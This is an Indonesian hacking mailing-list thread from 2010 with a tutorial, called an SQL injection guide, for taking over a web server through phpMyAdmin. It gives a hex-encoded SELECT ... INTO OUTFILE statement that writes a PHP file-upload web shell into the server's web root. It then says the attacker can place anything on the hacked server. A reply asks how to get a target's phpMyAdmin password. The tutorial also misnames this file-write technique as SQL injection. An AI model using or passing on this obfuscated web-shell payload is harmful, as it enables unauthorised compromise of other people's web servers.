Injin nyoba Pak --- On Mon, 30/8/10, Andy Rz <andy...@yahoo.co.id> wrote:
From: Andy Rz <andy...@yahoo.co.id> Subject: Bls: [YF] [SHARE] Teknik dasar hacking - SQL Injection To: yogyafree-perjuangan@yahoogroups.com Date: Monday, 30 August, 2010, 11:15 AM Thanks banget fren tutorialnya. Btw, query itu kan bisa dijalanin kalo kita dah masuk ke phpmyadminnya target ya...? Terus gimana caranya ya kita dapetin username dan pasword phpmyadminnya? Dari: Ferdiboys83 <ferdiboy...@yahoo.com> Kepada: yogyafree-perjuangan@yahoogroups.com Terkirim: Jum, 27 Agustus, 2010 17:40:51 Judul: [YF] [SHARE] Teknik dasar hacking - SQL Injection Sekedar berbagi ilmu buat yang ingin belajar hacking dan bukan bermaksud menyombongkan diri. Dalam kesempatan kali ini, saya ingin berbagi ke teman-teman semua dari hasil belajar hacking dengan teknik SQL Injection. Langkah-langkah sebelum mencoba hacking adalah : Berdoa, mohon ampun kepada Allah SWT semoga situs yang nantinya di hack bukan situs orang yang tidak bersalah Pahami aplikasi web server yang terpasang di situs/websitenya. Misalnya : xampp, wampp, dll Kesabaran dan terus mencoba apabila gagal Berikut penjelasannya.. A. Jika Teman-teman masuk dalam aplikasi yang berbasis webbase di kantor atau PC localhost teman-teman, masuklah ke halaman phpMyadmin seperti pada gambar dibawah ini. B. Setelah masuk kedalam phpmadmin, lihat variables atau jenis aplikasi web server yang digunakan terutama folder penyimpanan webnya. Misalkan aplikasi web server xampp. Lokasi penyimpanan berada di : xampp/htdocs C. Setelah mengetahui dan membayangkan lokasi penyimpanan foldernya, lakukan proses import dengan mengcopy-paste scrip dibawah ini : SELECT 0x3c3f706870206563686f20223c666f726d206d6574686f643d27504f53542720656e63747970653d276d756c7469706172742f666f726d2d64617461273e3c696e70757420747970653d2766696c6527206e616d653d2766696c656c65272073697a653d273434273e3c696e70757420747970653d277375626d6974273e3c2f666f726d3e223b40636f707928245f46494c45535b2766696c656c65275d5b27746d705f6e616d65275d2c245f46494c45535b2766696c656c65275d5b276e616d65275d293b3f3e INTO OUTFILE "c:/xampp/htdocs/test.php" D. Paste di Menu SQL seperti ini : E. Jika proses import tersebut berhasil, maka akan mencul pesan : Succes pada layar. F. Ketiklah halaman link yang kita inject tadi, dengan keterangan sebagai berikut : alamat ip/nama file yang kita inject Misalkan seperti diatas : 192.168.1.10/test.php Seperti pada layar berikut : G. Jika halaman atau target yang kita tentukan muncul seperti halaman yang ada diatas, maka proses SQL tadi sudah berhasil. Web yang kita SQL inject tadi sudah berhasil kita hack. Langkah selanjutnya teman-teman bisa memasukkan apapun ke dalam server yang sudah kita inject tadi. Catatan : Hacker adalah teknik mencari celah kelemahan suatu system, bukan sebagai perusak. Mohon maaf apabila ada kekurangan dan kesalahan dalam penjelasan saya. Disini saya masih belajar dan bukan untuk mensombongkan diri atas apa yang sudah saya dapatkan. Semoga pembahasan ini dapat bermanfaat bagi teman-teman semua. MAJU TERUS HACKER INDONESIA Ferdiboys83 Jangan buat hidup sulit, buatlah hidup menjadi lebih berarti